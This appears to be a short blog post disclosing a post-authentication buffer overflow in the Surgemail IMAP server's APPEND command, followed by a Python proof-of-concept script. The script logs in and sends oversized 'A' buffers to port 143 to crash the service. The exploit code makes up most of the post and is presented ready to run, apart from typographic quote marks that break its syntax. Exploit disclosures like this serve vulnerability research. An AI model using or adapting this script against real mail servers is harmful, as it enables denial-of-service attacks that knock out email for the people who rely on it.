The IMAP service in surgemail contains a remote buffer overflow problem in the APPEND command. The server can be remotely shutdown by issues a sequence of commands. Keep in mind that this is post authorized meaning that you’ll need an account to actually exploit this bug.
Code as follows:
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = ‘\x41′ * 3000
s.connect((’192.168.0.103′,143))
s.recv(1024)
s.send(’A001 LOGIN user@test.com user ‘ + buffer + ‘\r\n’)
s.recv(1024)
s.send(’A001 APPEND ‘ + buffer + ‘\r\n’)
s.recv(1024)
s.close()
to view the picture in full size.
0 Comments on “Surgemail - IMAP Denial of Service”
Leave a Comment